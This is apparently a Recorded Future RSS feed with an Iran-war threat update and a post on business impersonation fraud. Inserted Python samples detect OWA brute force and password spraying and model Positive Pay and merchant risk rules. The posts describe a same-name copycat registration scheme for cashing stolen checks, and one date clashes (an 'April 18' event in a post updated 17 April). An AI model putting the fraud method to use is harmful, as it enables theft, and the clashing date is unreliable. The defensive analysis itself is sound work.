<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>Recorded Future</title>
        <link>https://www.recordedfuture.com/ko</link>
        <description>Strengthen Your Defenses with Threat Intelligence</description>
        <lastBuildDate>Fri, 17 Apr 2026 17:53:08 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>Recorded Future, Inc.</generator>
        <language>en</language>
        <copyright>Copyright © 2026 Recorded Future, Inc.</copyright>
        <atom:link href="https://www.recordedfuture.com/ko/feed" rel="self" type="application/rss+xml"/>
        <item>
            <title><![CDATA[The Iran War: What You Need to Know]]></title>
            <link>https://www.recordedfuture.com/ko/blog/the-iran-war-what-you-need-to-know</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/the-iran-war-what-you-need-to-know</guid>
            <pubDate>Fri, 17 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group tracks the cyber, physical, and geopolitical components of the US-Israeli strikes on Iran — with continuously updated threat analysis and scenarios.]]></description>
            <content:encoded><![CDATA[
        <p><em>Last updated: 17 April 2026 at 1800 GMT</em></p>
        <div>
          <div>
            <div>
              <p><strong>New from Insikt Group: Iran War — Future Scenarios and Business Implications</strong></p>
              <p>Insikt Group has published a dedicated Cone of Plausibility analysis examining how the Iran conflict could evolve over the next 6–12 months — from a fragile ceasefire baseline to regional war, regime collapse, and nuclear crisis. Each scenario includes business implications and 0–90 day priority actions.</p>
            </div>
          </div>
          <div>
            <div><a href="https://www.recordedfuture.com/ko/research/iran-war-future-scenarios">Read the full analysis.</a></div>
          </div>
        </div>
        <p>This report is updated as the situation evolves across the geopolitical, cyber, and influence operations dimensions of this conflict. It will be of greatest interest to organizations in the US, Israel, and Gulf states concerned about targeting by Iranian state-sponsored or state-aligned threat actors, as well as those with exposure to energy markets, maritime shipping, and critical infrastructure potentially impacted by regional escalation.</p>
        <h3>The Latest Updates</h3>
        <h3>Geopolitical Landscape</h3>
        <ul>
          <li><strong>Strait of Hormuz declared open; blockade status remains ambiguous.</strong> Iran and the US both announced on April 18 that the Strait of Hormuz is open to commercial shipping, following a Lebanon ceasefire agreement. Iran stated ships must take a "coordinated route" running close to its coastline, suggesting it retains some administrative role in transit. President Trump separately confirmed the US blockade of Iranian port traffic remains in place, leaving the practical enforcement picture unclear. Insikt Group assesses that while the announcement represents a meaningful de-escalation signal, the divergence between Iranian route requirements and the US blockade's continued status means the Strait's governance remains contested — and the risk of renewed disruption remains elevated until the terms are codified.</li>
          <li><strong>Pakistan facilitating second round of US-Iran talks.</strong> A Pakistani delegation including Chief of Defense Forces Asim Munir met with Iran’s top negotiating officials in Tehran on April 16. Iran’s parliament has signaled a hard line: the ceasefire expiration must yield either international recognition of Iranian control over the Strait of Hormuz, or a return to war.</li>
          <li><strong>Iraqi Shi‘a militias continue attacks despite ceasefire.</strong> Since the April 7 ceasefire, Iraqi Shi‘a militias operating under the Islamic Resistance in Iraq (IRI) umbrella have <a href="https://english.alarabiya.net/News/gulf/2026/04/10/drone-strikes-targeting-kuwait-originated-from-iraq-sources-say">continued</a> drone and missile strikes against GCC infrastructure in Bahrain, Kuwait, and Saudi Arabia, and have targeted Iranian Kurdish dissident groups in Iraqi Kurdistan. Drone attacks at Baghdad International Airport on April 8 targeted a convoy carrying FBI personnel. Insikt Group assesses that Iran’s diminished command and control has afforded the militias greater tactical autonomy, and that they do not regard their operations as fully bound by the ceasefire. If the ceasefire collapses, militia activity is likely to intensify sharply.</li>
          <li><strong>Israel-Lebanon ceasefire announced; durability uncertain.</strong> President Trump announced a ten-day ceasefire between Israel and Lebanon beginning April 16. The first direct Israeli-Lebanese diplomatic talks since 1993 were held on April 14, facilitated by US Secretary of State Rubio. Hezbollah has denounced the talks; Lebanese President Aoun declined direct engagement with Israeli PM Netanyahu, citing the need for a ceasefire before direct negotiations. Insikt Group assesses this diplomatic engagement increases opportunities for de-escalation in Lebanon, but significant hurdles remain.</li>
        </ul>
        <h3>Cyber Threat Landscape</h3>
        <ul>
          <li><strong>GreenGolf (MuddyWater) conducting large-scale data exfiltration across the Middle East.</strong> Oasis Security <a href="https://www.scworld.com/brief/extensive-muddywater-like-attack-campaign-against-middle-eastern-critical-infrastructure-detailed">reported</a> on April 14 a multi-stage campaign, attributed to infrastructure overlapping with GreenGolf, that targeted more than 12,000 internet-exposed systems in the aviation, energy, infrastructure, and government sectors across the Middle East. The campaign exploited five newly disclosed CVEs for initial reconnaissance and harvested credentials by brute-forcing Outlook Web Access with Patator, a legitimate penetration testing tool. Confirmed exfiltration from a compromised Egyptian aviation organization included passport and visa records, payroll data, credit card information, and internal corporate documents. C2 infrastructure used Python- and Go-based controllers communicating over TCP, UDP, and HTTP with AES encryption, consistent with the ArenaC2 framework pattern previously associated with GreenGolf activity.</li>
        </ul>
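        <p>The brute-force component of that campaign is detectable from ordinary web-server logs. The Python below is an added example, not code from Recorded Future, Oasis Security or the Patator project: it reads constructed IIS-style log lines and raises one alert per source IP when failures against the Exchange logon endpoints pile up from a single address inside a ten-minute window (single-account brute force, the Patator pattern) or when failures from one address spread across many accounts (password spray). The log format, the threshold values and the assumption that a failed logon appears as an HTTP 401 to /owa/auth.owa are all assumptions made for the sample.</p>

```python
"""Brute-force and password-spray detection for Outlook Web Access logons,
added here as an illustration; it is not Recorded Future's, Oasis Security's
or Patator's code. The IIS-style log lines are constructed, and the sample
assumes a failed logon is recorded as an HTTP 401 response to /owa/auth.owa
(forms-based OWA deployments typically redirect a failed logon back to the
logon page instead, so map the failure signal to what your servers log)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

AUTH_PATHS = {"/owa/auth.owa", "/ews/exchange.asmx", "/autodiscover/autodiscover.xml"}
FAILED_STATUS = {"401"}
WINDOW = timedelta(minutes=10)
FAILURE_THRESHOLD = 20   # failures from one source IP inside WINDOW -> brute force
SPRAY_THRESHOLD = 10     # distinct accounts failed from one source IP inside WINDOW -> spray


def build_sample_log() -> list[str]:
    """Constructed W3C-style lines: date time c-ip cs-method cs-uri-stem cs-username sc-status."""
    base = datetime(2026, 4, 10, 9, 0, 0)
    lines = ["#Fields: date time c-ip cs-method cs-uri-stem cs-username sc-status"]

    def add(ts, ip, user, status, path="/owa/auth.owa"):
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} {ip} POST {path} {user} {status}")

    # A real user mistypes twice, then succeeds (302 on to the mailbox).
    add(base, "192.0.2.5", "dana", "401")
    add(base + timedelta(seconds=20), "192.0.2.5", "dana", "401")
    add(base + timedelta(seconds=40), "192.0.2.5", "dana", "302")
    # Single-account brute force: one user, many guesses, three seconds apart.
    for i in range(25):
        add(base + timedelta(seconds=3 * i), "198.51.100.9", "carol", "401")
    # Password spray: many accounts, one guess each, five seconds apart.
    for i in range(15):
        add(base + timedelta(minutes=1, seconds=5 * i), "203.0.113.7", f"user{i:02d}", "401")
    return lines


def parse(lines):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rec = dict(zip(fields, line.split()))
            rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
            yield rec


def detect(lines) -> list[tuple[str, str, int]]:
    """Sliding-window counts per source IP. Returns (rule, c-ip, count), one
    alert per IP per rule, in the order the thresholds were first crossed."""
    recent = defaultdict(deque)   # c-ip -> deque of (ts, username) failures inside WINDOW
    alerted, alerts = set(), []
    for rec in sorted(parse(lines), key=lambda r: r["ts"]):
        if rec["cs-uri-stem"].lower() not in AUTH_PATHS or rec["sc-status"] not in FAILED_STATUS:
            continue
        ip, window = rec["c-ip"], recent[rec["c-ip"]]
        window.append((rec["ts"], rec["cs-username"].lower()))
        while rec["ts"] - window[0][0] > WINDOW:   # drop failures older than the window
            window.popleft()
        accounts = {user for _, user in window}
        if len(window) >= FAILURE_THRESHOLD and ("brute_force", ip) not in alerted:
            alerted.add(("brute_force", ip))
            alerts.append(("brute_force", ip, len(window)))
        if len(accounts) >= SPRAY_THRESHOLD and ("password_spray", ip) not in alerted:
            alerted.add(("password_spray", ip))
            alerts.append(("password_spray", ip, len(accounts)))
    return alerts


if __name__ == "__main__":
    for alert in detect(build_sample_log()):
        print(*alert)
```

        <p>Baseline the thresholds against your own logon volume before deploying this, and note that the 401 criterion fits Basic- and NTLM-authenticated endpoints such as EWS and Autodiscover; forms-based OWA needs the failure test adapted to the redirect it returns.</p>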
        <h3>Influence Operations</h3>
        <ul>
          <li><strong>Iran using state media to portray blockade as ineffective.</strong> Iranian state-affiliated outlets including Fars News and IRGC-affiliated Tasnim News are actively publicizing instances of sanctioned vessels transiting the Strait, framing the US blockade as a failure. Insikt Group assesses this reflects a coordinated information operation designed to reinforce domestic narratives of regime control over the strategic chokepoint and to limit public concern over the blockade’s anticipated economic impact.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1639b94af082849a6929a572441c5012d6e2eb22d.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[From Bazooka to Fake Nikes]]></title>
            <link>https://www.recordedfuture.com/ko/blog/from-bazooka-to-fake-nikes</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/from-bazooka-to-fake-nikes</guid>
            <pubDate>Thu, 16 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A deep dive into business impersonation fraud — from fake companies cashing stolen checks to AI-powered shopping scams — and why the same vulnerability enables both.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>Business impersonation is the hidden thread connecting old and new fraud. Discover how the same core tactic is fueling both a surge in commercial check fraud and an explosion of AI-powered online shopping scams targeting younger consumers.</li>
                <li>Tools like Positive Pay and 3D Secure authentication, while effective against the fraud they were built to stop, have pushed threat actors to evolve their schemes in ways that render those controls irrelevant.</li>
                <li>Ecosystem gaps are often the real vulnerability. Fraudsters exploit the chain of assumed trust between social media platforms, card networks, merchant onboarders, banks, and local business registries — turning each party's reliance on the last into an open door.</li>
              </ul>
            </div>
          </div>
        </div>
        <p>If you’re a millennial or Gen Z-er, then you probably haven’t used a paper check in a while. According to the <a href="https://www.atlantafed.org/research-and-data/surveys/survey-and-diary-of-consumer-payment-choice?utm_source=substack&amp;utm_medium=email#panel=2">Federal Reserve Bank of Atlanta</a>, just 1 out of 5 of your peers used a check in the last 30 days, versus 2 out of 5 Gen Xers and 3 out of 5 boomers. Yet despite year-on-year decreases in overall usage, <a href="https://verafin.com/2025/12/nasdaq-verafin-catches-over-1-billion-in-check-fraud-in-2025/?utm_source=substack&amp;utm_medium=email">Nasdaq Verafin</a> saw check fraud instances rise another 11% in 2025.</p>
        <p>Then again, if you are a millennial or Gen Z-er, you will have seen an advertisement for a cheap product on social media. For <a href="https://www.pewresearch.org/short-reads/2025/11/19/about-a-third-of-americans-say-theyve-had-an-online-shopping-scam-happen-to-them/?utm_source=substack&amp;utm_medium=email">40% of you</a>, that has meant falling for an online shopping scam.</p>
        <p>On the face of it, these look like two ends of the fraud spectrum:</p>
        <ul>
          <li>On the one hand, we have what feels like the past: paper check usage rates even among those aged 65+ fell from 13% of transactions in 2013 to 6% in 2025 (<a href="https://www.atlantafed.org/research-and-data/publications/take-on-payments/2025/07/07/innovations-in-payments-acceptance-play-out-in-consumer-check-use?utm_source=substack&amp;utm_medium=email">Federal Reserve Bank of Atlanta</a>).</li>
          <li>On the other hand, we have the future: online shopping scams target a younger demographic through AI-enabled brand impersonation and sprawling social media ad ecosystems.</li>
        </ul>
        <p>The payment instruments, demographics, and the teams working at financial institutions to address these problems differ. So what’s the thread linking them together? Business impersonation. It manifests differently in each scheme, but it is the fraudster’s answer to both families of control: the anti-fraud systems built to detect check washing and counterfeiting on the one hand, and those built to detect unauthorized third-party card fraud on the other.</p>
        <h2>Commercial checks and copycat businesses across state lines</h2>
        <p>In the past, stolen checks were typically washed to change the payee and amount, then walked into a bank for cashout. The Postal Inspection Service received over 299,000 mail theft complaints in a single 12-month period, a 161% increase from the prior year. Recorded Future’s Fraud Intelligence Team analyzed and mapped stolen checks to US geographies, illustrating hot spots of physical crime and observing that it remains a national issue that extends beyond heavily urbanized areas.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ae67a7886291f3ca973623a136518e5754335b02.png?width=750&amp;format=png&amp;optimize=medium" width="1381" height="751" />
            </div>
          </div>
          <div>
            <div><em>Mapping stolen checks by zip code; courtesy of Recorded Future</em></div>
          </div>
        </div>
        <p>Yet even among declining consumer check usage rates, businesses’ use of commercial checks remains stubbornly high in the US: the <a href="https://www.financialprofessionals.org/training-resources/resources/survey-research-economic-data/Details/payments-fraud?__hstc=110159258.08b65636f3e81487b21bd53bc12a6e37.1770568886227.1770668440686.1770742788656.3&amp;__hssc=110159258.1.1770742788656&amp;__hsfp=4888b6684dc00907b9aeb05be67a9fa9&amp;utm_source=substack&amp;utm_medium=email">Association for Financial Professionals</a> (AFP) found that 91% of organizations are still using checks, and 63% experienced check fraud in 2024. When businesses send checks to suppliers, the amounts can rise quickly, leading fraudsters to expand beyond simple check-washing schemes.</p>
        <p>In perhaps the most eye-catching example, fraudsters <a href="https://manhattanda.org/d-a-bragg-check-fraud-ring-indicted-for-stealing-1-2m-from-bazooka-companies-maker-of-classic-bubble-gum/?utm_source=substack&amp;utm_medium=email">intercepted</a> a commercial check destined for bubble-gum giant Bazooka in 2022. A $1.24 million check. Over the next two weeks, they transferred and withdrew over half a million dollars. How’d they do it? You can’t just wash out the payee name on a million-dollar check, replace it with John Smith, and expect it to clear after depositing it into a personal checking account.</p>
        <p>Instead, the threat actors just created a fake Bazooka. The real Bazooka is registered in Delaware under the name “The Bazooka Companies, LLC”, so culprits registered a fictitious company in New York under the name “The Bazooka Companies 1 Inc”. They then used the official business license to open a corporate bank account for the new fictitious business. From there, they used cashier checks, withdrawals, and transfers to personal accounts to cash out the funds.</p>
        <p>Fast forward to today, and the scheme is still happening. Recent research from <strong><a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Recorded Future Payment Fraud Intelligence</a></strong> <strong>(PFI)</strong> surveyed stolen checks for sale on Telegram in Q4 2025 and found over 30 checks with a business as the payee, along with suspicious new entities registered in other states a few days later. The total face value of the checks amounted to $2M.</p>
        <p>As with most fraud, this scheme’s emergence is based on:</p>
        <ul>
          <li><strong>Exploiting ecosystem gaps between disparate parties:</strong> Businesses can have the same name as another when registered in different states. Pair that with most states’ limited mandate to investigate business registrations, and we’re left with the first gap:</li>
        </ul>
        <p><em>“As long as the basic filing requirements are met, the office[s] may have little or no authority to question or reject a document submitted for filing or to verify information included in the filing”</em> (<a href="https://www.nass.org/sites/default/files/reports/final-nass-report-business-filing-fraud-091925.pdf?utm_source=substack&amp;utm_medium=email">National Association of Secretaries of State</a>, September 2025)</p>
        <p>When a fraudster approaches a bank to open a business bank account, the bank conducts its own due diligence. But the focus here is on money laundering threats and the legitimacy of documents and applicants. If the fraudsters are using a clean identity — synthetic or otherwise — then the bank won’t have a clear reason to reject the application just because a business called John’s Toilet Supply, LLC exists in another state.</p>
        <ul>
          <li><strong>Delivering a reactionary counterpunch to effective fraud processes:</strong> Think of this as the cat-and-mouse game. Fraud defenders figure out how to stop one scheme, forcing fraudsters to innovate. In this case, Positive Pay has proven remarkably effective at preventing check washing and counterfeit checks (when parties agree to use it). Payee Positive Pay, in particular, allows the payer to make sure that when their checks are deposited, the check number, date, payee name, and amount match their files. But what happens if everything is correct, but a copycat payee deposits the check? Cases like Bazooka.</li>
        </ul>
        <h2>80% discount on shoes? How can you say no?</h2>
        <p>If we detour into e-commerce, we see a very similar dynamic play out, but at a staggeringly larger scale. The premise is simple: use AI to launch a fake online shop impersonating company A, B, or C, buy ad space on social media to drive traffic, pocket the proceeds, and launder the funds while customers wait for goods that never arrive.</p>
        <p>The scheme works because 53% of consumers, and 76% of Gen Zers, now begin shopping journeys on social media, according to <a href="https://www.salesforce.com/news/stories/social-shopping-stats-2025/?utm_source=substack&amp;utm_medium=email">Salesforce’s 2025 report</a>. The problem is that the journey is littered with traps: in November 2025, <a href="https://www.reuters.com/investigations/meta-is-earning-fortune-deluge-fraudulent-ads-documents-show-2025-11-06/?utm_source=substack&amp;utm_medium=email">leaked internal documents</a> from Meta claimed the “company shows its platforms’ users an estimated 15 billion ‘higher risk’ scam advertisements — those that show clear signs of being fraudulent — every day”. Industry reporting paints the same picture, with the Better Business Bureau finding online shopping scams to be the most reported scam type and social media advertisements the most common point of origin.</p>
        <div>
          <div>
            <div>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ccaa97f85eebb173855f1669c1422aee9e49f717.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1600" height="1200" />
              </p>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_11e27062f373f6e184680c4d10916a2b03c3da510.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1600" height="1153" />
              </p>
            </div>
          </div>
          <div>
            <div><em>Brand impersonation shopping scams impacting shoppers in January 2026; courtesy of Recorded Future</em></div>
          </div>
        </div>
        <p>The basics of the scheme are nothing new: capture payment card data by creating a fake online store and advertising too-good-to-be-true discounts. What’s changed is that these are no longer just phishing websites. They’re functional online shops that process payments via merchant accounts. Behind each of these merchant accounts is a registered business.</p>
        <p>This is creating problems throughout the ecosystem:</p>
        <ul>
          <li>Cardholders see websites that exactly mimic major (and increasingly niche) brands, letting discounts outweigh better judgment.</li>
          <li>Financial institutions face the challenge of balancing their duty of care to process customer transactions with the risks of fraud and money laundering. But in these cases, the traditional indicators of cyber-enabled fraud aren’t present. The cardholder is authorizing the transaction, and there’s nothing suspicious within the behavioral or device indicators of the 3D Secure authentication stream. (Because, again, it’s the cardholder doing the transacting under manipulation.)</li>
          <li>The fingers begin to point back at the acquirers and payment facilitators responsible for merchant onboarding, but, from their perspective, the entity holds a proper commercial license to engage in business issued by the local authorities. (Though, as a divergence from the check fraud scheme, the fraudsters in online shopping scams rarely impersonate a real big-name brand at the business creation and merchant onboarding stage. Instead, the fraudsters hide evidence of impersonation from the merchant onboarders and leave the impersonation for the ads and fake online shops visible to victims.)</li>
        </ul>
        <p>But just like with the check fraud example, a big part of why online shopping scams have exploded — outside of generative AI making brand abuse content easier than ever to create at scale — is ecosystem gaps and fraudsters reacting to the defense:</p>
        <ul>
          <li><strong>Exploiting ecosystem gaps between disparate parties:</strong> By the time a victim is making a purchase on an online shopping scam website, each entity along the way has looked to the one before and trusted that due diligence had been performed. The cardholder wants to trust that the social media platform screened out malicious advertisers; the card issuer wants to trust the cardholder vetted the merchant; the card network wants to trust the merchant onboarder verified the business; and the merchant onboarder wants to trust local authorities properly licensed the business. A big, long line of incentivized trust.</li>
          <li><strong>Delivering a reactionary counterpunch to effective fraud processes:</strong> The industry has made huge strides in combating unauthorized, third-party card-not-present (CNP) fraud in the last decade. A major part of the success has been built on 3D Secure, introducing a layer of authentication on top of existing authorization controls. Online shopping scams completely sidestep the defensive layer by making the merchant the fraud surface and rendering cardholder authentication controls irrelevant.</li>
        </ul>
        <h2>Thinking towards the way out</h2>
        <p>On the check fraud side, the best solution may already be available, but, as with most solutions, it comes with trade-offs and adoption issues. The basic idea of Positive Pay and its derivative, Payee Positive Pay, is that a business informs its bank of the checks it is sending, and the bank only disburses funds if the check matches what the business provided. Positive Pay was designed to combat counterfeit and forged checks, and it does that very well.</p>
        <p>Of course, in the Bazooka example of same-name business impersonation, this wouldn’t help. Nothing about the check was modified. So here, banks offer Reverse Positive Pay, under which the bank reports each check presented for payment and the business itself approves or rejects it before funds move. It can solve the problem but shifts more operational and investigatory expense onto the business (which might explain why <a href="https://www.alkami.com/resources/research/reports/positive-pay-adoption-trends-strategies-for-banks-credit-unions?utm_source=substack&amp;utm_medium=email">adoption rates</a> are south of 20%, according to Datos Insights and Alkami). In the end, though, it makes you wonder why businesses don’t heed the advice and move to electronic payment methods.</p>
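        <p>To make the gap concrete, here is an added worked example in Python (not Recorded Future’s, Bazooka’s or any bank’s code) of the Payee Positive Pay match described above and the same-name copycat it cannot see. The issued-check file, the presented items and the vendor registration data are constructed. The depositor-entity check at the end is a hypothetical extension: it assumes the bank can see the depositing account’s legal name and registration state, which in practice sit at the bank of first deposit rather than the paying bank, and it stands in for the review a business would do itself under Reverse Positive Pay.</p>

```python
"""Payee Positive Pay and the same-name copycat gap, as an added worked example.
This is not Recorded Future's, Bazooka's or any bank's code; the issued-check
file, the presented items and the vendor registration data are constructed,
and the depositor-entity check is a hypothetical extension."""
import re
from dataclasses import dataclass
from decimal import Decimal


@dataclass(frozen=True)
class Check:
    number: str
    date: str          # issue date, ISO format
    payee: str
    amount: Decimal


@dataclass(frozen=True)
class Deposit:
    check: Check
    account_entity: str   # legal name on the depositing business account
    account_state: str    # state that registered that entity


# Constructed issued-check file the payer uploaded to its bank.
ISSUED = {
    "100231": Check("100231", "2022-03-01", "The Bazooka Companies, LLC", Decimal("1240000.00")),
    "100232": Check("100232", "2022-03-01", "Acme Paper Supply Inc", Decimal("4180.50")),
}

# Constructed vendor master: where each payee is actually registered.
VENDOR_REGISTRY = {
    "The Bazooka Companies, LLC": "DE",
    "Acme Paper Supply Inc": "TX",
}


def normalize(name: str) -> str:
    """Fold case, punctuation and spacing so routine formatting differences
    ('THE BAZOOKA COMPANIES LLC') do not raise false exceptions."""
    return re.sub(r"[^a-z0-9]+", " ", name.lower()).strip()


def payee_positive_pay(presented: Check) -> tuple[str, str]:
    """Classic Payee Positive Pay: PAY only if number, date, payee and amount
    match the issued file; anything else becomes an exception for the payer."""
    on_file = ISSUED.get(presented.number)
    if on_file is None:
        return "EXCEPTION", "check number not in issued file (counterfeit)"
    if on_file.amount != presented.amount:
        return "EXCEPTION", f"amount altered: {on_file.amount} -> {presented.amount}"
    if normalize(on_file.payee) != normalize(presented.payee):
        return "EXCEPTION", f"payee altered: {on_file.payee!r} -> {presented.payee!r}"
    if on_file.date != presented.date:
        return "EXCEPTION", "date altered"
    return "PAY", "instrument matches issued file"


def depositor_matches_payee(dep: Deposit) -> tuple[str, str]:
    """Hypothetical extension: compare the depositing account's entity and
    registration state with the vendor master. Positive Pay never looks here,
    which is the gap a same-name copycat registered in another state exploits."""
    expected_state = VENDOR_REGISTRY.get(dep.check.payee)
    if expected_state is None:
        return "REVIEW", "payee not in vendor master"
    if normalize(dep.account_entity) != normalize(dep.check.payee):
        return "REVIEW", f"depositor {dep.account_entity!r} is not the payee"
    if dep.account_state != expected_state:
        return "REVIEW", f"same name, but registered in {dep.account_state}; vendor is in {expected_state}"
    return "OK", "depositor is the registered vendor"


def screen(dep: Deposit) -> tuple[str, str]:
    """Run both checks; the instrument check alone passes the copycat."""
    decision, reason = payee_positive_pay(dep.check)
    if decision != "PAY":
        return decision, reason
    return depositor_matches_payee(dep)


# Constructed scenarios.
WASHED = Deposit(Check("100232", "2022-03-01", "John Smith", Decimal("4180.50")), "John Smith", "NY")
COUNTERFEIT = Deposit(Check("200001", "2022-03-05", "Acme Paper Supply Inc", Decimal("9000.00")),
                      "Acme Paper Supply Inc", "TX")
COPYCAT = Deposit(ISSUED["100231"], "The Bazooka Companies 1 Inc", "NY")
EXACT_NAME_COPYCAT = Deposit(ISSUED["100231"], "The Bazooka Companies, LLC", "NY")
GENUINE = Deposit(ISSUED["100231"], "The Bazooka Companies, LLC", "DE")

if __name__ == "__main__":
    for label, dep in [("washed", WASHED), ("counterfeit", COUNTERFEIT), ("copycat", COPYCAT),
                       ("exact-name copycat", EXACT_NAME_COPYCAT), ("genuine", GENUINE)]:
        print(f"{label:18} positive pay: {payee_positive_pay(dep.check)[0]:9} full screen: {screen(dep)}")
```

        <p>The washed and counterfeit items fail the instrument check as Positive Pay intends; both copycats pass it, because the instrument is genuine, and are only caught by looking at who is depositing rather than at what is being deposited.</p>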
        <p>On the online shopping scam side, solutions are more complex and scattered across the ecosystem.</p>
        <ul>
          <li>At the top of the funnel, there’s rising pressure on online advertising platforms to do a better job at limiting the presence of fraudulent advertisements. Based on more leaked internal Meta documents, regulatory pressure may not be producing the desired outcome.</li>
          <li>At the merchant onboarding level, both the major card networks are forcing acquirers and payment facilitators to do more to defend the gates into payment processing, while also devoting more resources to identifying scam merchants that do make it in.</li>
        </ul>
        <p>For card issuers on the frontline, it’s a more delicate dance. Card issuers aren’t on the hook for authorized card payments to fraudsters in the way the Fair Credit Billing Act (FCBA) and Electronic Funds Transfer Act (EFTA) make them liable for unauthorized use (a credit cardholder can still dispute non-delivery as a billing error), but <a href="https://www.alloy.com/reports/2025-scams-report?utm_source=substack&amp;utm_medium=email">67% of cardholders</a> expect them to cover scam losses. And when cards that transacted on scam websites end up on the dark web for resale, and unauthorized charges start rolling in, it is squarely the issuer’s problem.</p>
        <p>The best solution aligns with the industry’s movement toward <a href="https://intelligence2risk.substack.com/p/the-need-for-cyber-fraud-fusion-centers?utm_source=substack&amp;utm_medium=email">CTI-fraud fusion models</a> to address the cyber component of cyber-enabled fraud. Purchase scams run through fake online shops are precisely the type of problem the new organizational model was meant to combat.</p>
        <p>In applying the CTI-fraud fusion model to purchase scams, traditional fraud assets start at the end of the fraud attack chain, correlating reported cardholder manipulation and non-delivery alerts against merchant account patterns. The CTI assets start at the beginning, finding online shopping scams while they are live and attributing the abused merchant accounts. The two teams then meet in the middle, combining modeled transaction patterns with threat-hunted active scam websites, which ultimately leads to the deployment of merchant-based fraud risk rules.</p>
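        <p>As an added illustration of that meeting point (not Recorded Future’s fusion-center logic or product code), the Python below joins an issuer’s transaction and non-delivery dispute records with CTI attributions of live scam shops to the merchant accounts behind them, and emits a merchant-level rule for each. All records, the thresholds and the rule names are constructed assumptions; the design point is that a CTI attribution alone escalates, a dispute rate alone queues a hunt, and the two together justify a decline.</p>

```python
"""Merchant-based risk rules built where the fraud team's dispute data and
the CTI team's live scam-shop attributions meet. Added illustration only; it
is not Recorded Future's fusion-center logic or product code. The transactions,
disputes and attributions are constructed, and the thresholds and rule names
are assumptions."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Txn:
    merchant_id: str
    amount: float
    nondelivery_dispute: bool   # cardholder later reported the goods never arrived


def build_sample_txns() -> list[Txn]:
    """Constructed issuer-side view: the end of the attack chain."""
    def batch(mid, count, disputes, amount):
        return [Txn(mid, amount, i < disputes) for i in range(count)]
    return (batch("M-2044", 40, 6, 79.99)      # fake sneaker outlet
            + batch("M-3110", 8, 1, 129.00)    # new merchant, little history
            + batch("M-5002", 50, 4, 45.50)    # no CTI hit, but 8% non-delivery
            + batch("M-7777", 100, 1, 60.00))  # ordinary retailer


# Constructed CTI-side view: scam shops found while live and attributed to the
# merchant account whose descriptor appeared at checkout.
CTI_ATTRIBUTIONS = {
    "kicks-outlet-sale.example": {"merchant_id": "M-2044", "impersonates": "Nike", "confidence": "high"},
    "bargain-boots.example": {"merchant_id": "M-3110", "impersonates": "niche bootmaker", "confidence": "medium"},
    "preorder-parkas.example": {"merchant_id": "M-9001", "impersonates": "outdoor brand", "confidence": "medium"},
}

MIN_TXNS = 20               # do not judge a merchant on a handful of transactions
DISPUTE_RATE_REVIEW = 0.05  # non-delivery disputes per transaction that warrant a hunt


def merchant_stats(txns):
    """Per-merchant transaction and non-delivery dispute counts."""
    stats = defaultdict(lambda: {"count": 0, "disputes": 0})
    for t in txns:
        stats[t.merchant_id]["count"] += 1
        stats[t.merchant_id]["disputes"] += int(t.nondelivery_dispute)
    return stats


def build_rules(txns, attributions) -> dict[str, tuple[str, str]]:
    """Return merchant_id -> (action, reason). Two independent signals (a live
    scam shop attributed by CTI plus cardholder disputes) justify a decline;
    either alone only escalates."""
    stats = merchant_stats(txns)
    by_merchant = {a["merchant_id"]: (domain, a["confidence"]) for domain, a in attributions.items()}
    rules = {}
    for mid in set(stats) | set(by_merchant):
        s = stats.get(mid, {"count": 0, "disputes": 0})
        rate = s["disputes"] / s["count"] if s["count"] else 0.0
        hit = by_merchant.get(mid)
        if hit and hit[1] == "high":
            rules[mid] = ("decline", f"attributed to live scam shop {hit[0]}")
        elif hit and s["disputes"]:
            rules[mid] = ("decline", f"scam shop {hit[0]} corroborated by {s['disputes']} non-delivery dispute(s)")
        elif hit:
            rules[mid] = ("step_up", f"scam shop {hit[0]} attributed, no disputes yet")
        elif s["count"] >= MIN_TXNS and rate >= DISPUTE_RATE_REVIEW:
            rules[mid] = ("review", f"non-delivery rate {rate:.0%} over {s['count']} transactions")
    return rules


if __name__ == "__main__":
    for mid, (action, reason) in sorted(build_rules(build_sample_txns(), CTI_ATTRIBUTIONS).items()):
        print(f"{mid}: {action:8} {reason}")
```

        <p>Note the two edge cases the rules handle deliberately: a merchant with eight transactions and one dispute would never clear the volume floor on its own, but a CTI attribution turns that single dispute into corroboration; and a merchant CTI has attributed but the issuer has not yet seen gets a step-up rule ahead of the first transaction.</p>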
        <p>So, in the meantime, where does all this leave us? The same thing you’ve heard plenty of times: stop using checks if you can and don’t trust too-good-to-be-true offers from online ads.</p>
        <h3><strong>How Recorded Future Helps</strong></h3>
        <p>The research in this blog came directly from Recorded Future's Fraud Intelligence teams. Two capabilities speak to the threats described.</p>
        <ul>
